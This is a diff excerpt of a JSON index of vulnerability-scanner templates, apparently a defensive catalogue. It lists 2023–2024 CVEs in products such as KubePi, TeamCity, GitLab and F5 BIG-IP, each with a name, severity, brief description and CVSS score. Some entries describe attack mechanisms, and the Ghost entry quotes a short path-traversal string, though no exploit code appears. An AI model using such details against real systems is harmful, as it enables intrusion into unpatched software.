{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
|
||||
{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"}
|
||||
|
|
@ -2074,6 +2079,7 @@
|
|||
{"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"}
|
||||
{"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"}
|
||||
{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
|
||||
{"ID":"CVE-2023-27032","Info":{"Name":"PrestaShop AdvancedPopupCreator - SQL Injection","Severity":"critical","Description":"In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27032.yaml"}
|
||||
{"ID":"CVE-2023-27034","Info":{"Name":"Blind SQL injection vulnerability in Jms Blog","Severity":"critical","Description":"The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27034.yaml"}
|
||||
{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
|
||||
{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
|
||||
|
|
@ -2130,6 +2136,7 @@
|
|||
{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
|
||||
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
|
||||
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
|
||||
{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
|
||||
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
|
||||
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
|
||||
{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
|
||||
|
|
@ -2206,6 +2213,7 @@
|
|||
{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"}
|
||||
{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"}
|
||||
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
|
||||
{"ID":"CVE-2023-38964","Info":{"Name":"Academy LMS 6.0 - Cross-Site Scripting","Severity":"medium","Description":"Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38964.yaml"}
|
||||
{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"}
|
||||
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
|
||||
{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"}
|
||||
|
|
@ -2250,6 +2258,7 @@
|
|||
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
|
||||
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
|
||||
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
|
||||
{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"}
|
||||
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
|
||||
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
|
||||
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
|
||||
|
|
@ -2258,6 +2267,8 @@
|
|||
{"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"}
|
||||
{"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"}
|
||||
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
|
||||
{"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"}
|
||||
{"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"}
|
||||
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
|
||||
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
|
||||
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
|
||||
|
|
@ -2265,6 +2276,7 @@
|
|||
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
|
||||
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
|
||||
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
|
||||
{"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"}
|
||||
{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
|
||||
{"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"}
|
||||
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
|
||||
|
|
@ -2283,6 +2295,7 @@
|
|||
{"ID":"CVE-2023-4973","Info":{"Name":"Academy LMS 6.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4973.yaml"}
|
||||
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
|
||||
{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"}
|
||||
{"ID":"CVE-2023-5003","Info":{"Name":"Active Directory Integration WP Plugin \u003c 4.1.10 - Log Disclosure","Severity":"high","Description":"The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-5003.yaml"}
|
||||
{"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"}
|
||||
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
|
||||
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
|
||||
|
|
@ -2317,6 +2330,7 @@
|
|||
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
||||
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
||||
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
||||
{"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"}
|
||||
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
|
||||
{"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"}
|
||||
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
|
||||
|
|
@ -2324,6 +2338,7 @@
|
|||
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
|
||||
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
||||
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
|
||||
{"ID":"CVE-2024-1183","Info":{"Name":"Gradio - Server Side Request Forgery","Severity":"medium","Description":"An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-1183.yaml"}
|
||||
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
|
||||
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
|
||||
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
|
||||
|
|
@ -2338,8 +2353,12 @@
|
|||
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
|
||||
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
|
||||
